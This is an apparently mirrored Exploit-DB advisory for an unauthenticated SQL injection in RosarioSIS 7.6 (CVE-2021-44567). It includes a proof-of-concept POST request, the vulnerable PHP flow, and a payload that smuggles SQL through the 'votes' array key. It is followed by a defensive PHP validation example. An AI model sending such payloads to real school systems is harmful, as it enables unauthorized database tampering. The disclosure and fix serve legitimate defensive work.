[webapps] RosarioSIS 7.6 - SQL Injection
RosarioSIS 7.6 and earlier contain an unauthenticated SQL injection vulnerability; an attacker can exploit it by sending a crafted request through the votes parameter in PortalPollsNotes.fnc.php. 2025-4-11 00:0:0 Author: www.exploit-db.com

# Exploit Title: [RosarioSIS < 7.6.1 Unauthenticated SQL Injection via votes Parameter in PortalPollsNotes.fnc.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://gitlab.com/francoisjacquet/rosariosis]
# Software Link: [https://gitlab.com/francoisjacquet/rosariosis]
# Version: [7.6] 
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2021-44567]

PoC:
POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
X-Requested-With: XMLHttpRequest

Constraints and code flow:
if ( isset( $_POST['votes'] )
    && is_array( $_POST['votes'] )
    && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' )
{
    foreach ( (array) $_POST['votes'] as $poll_id => $votes_array )
    {
        if ( ! empty( $votes_array ) )
        {
            // $poll_id is the array key taken directly from the request.
            PortalPollsVote( $poll_id, $votes_array );
        }
    }
}

votes['; CREATE TABLE aaa(t text) --]=1
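
The flow above passes the array key of `votes` to `PortalPollsVote()` unchecked, so the key is as attacker-controlled as the value. The following added example (not RosarioSIS code and not the vendor's patch) validates keys and values before any query is built; `filter_poll_votes()` and the integer ranges are assumptions made for illustration.

```php
<?php
// Added example, not RosarioSIS code; filter_poll_votes() is a hypothetical helper.
// Assumption: poll ids are positive integers, question indexes and votes are
// non-negative integers. Adjust the ranges to the real schema.
function filter_poll_votes( array $post, array $server ): array
{
    // Same preconditions as the request flow described above.
    if ( ! isset( $post['votes'] )
        || ! is_array( $post['votes'] )
        || ( $server['HTTP_X_REQUESTED_WITH'] ?? '' ) !== 'XMLHttpRequest' ) {
        return [];
    }

    $positive     = [ 'options' => [ 'min_range' => 1 ] ];
    $non_negative = [ 'options' => [ 'min_range' => 0 ] ];
    $clean        = [];

    foreach ( $post['votes'] as $poll_id => $votes_array ) {
        // The array KEY comes from the request: accept only a plain positive
        // integer, so quotes, semicolons and comments never reach SQL.
        $id = filter_var( $poll_id, FILTER_VALIDATE_INT, $positive );

        if ( $id === false || empty( $votes_array ) ) {
            continue;
        }

        $votes = [];
        foreach ( (array) $votes_array as $question => $vote ) {
            $q = filter_var( $question, FILTER_VALIDATE_INT, $non_negative );
            $v = filter_var( $vote, FILTER_VALIDATE_INT, $non_negative );

            if ( $q === false || $v === false ) {
                continue 2; // One bad field discards the whole poll entry.
            }
            $votes[ $q ] = $v;
        }
        $clean[ $id ] = $votes;
    }

    return $clean;
}

// Constructed sample input: one well-formed vote plus the malformed key from the PoC.
$post = [ 'votes' => [ '3' => [ 0 => 2 ], "'; CREATE TABLE aaa(t text) --" => 1 ] ];
var_export( filter_poll_votes( $post, [ 'HTTP_X_REQUESTED_WITH' => 'XMLHttpRequest' ] ) );
```

Validated integers should still be bound as query parameters rather than concatenated into SQL, so the query stays safe if the validation is later loosened.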
            

Source: https://www.exploit-db.com/exploits/52169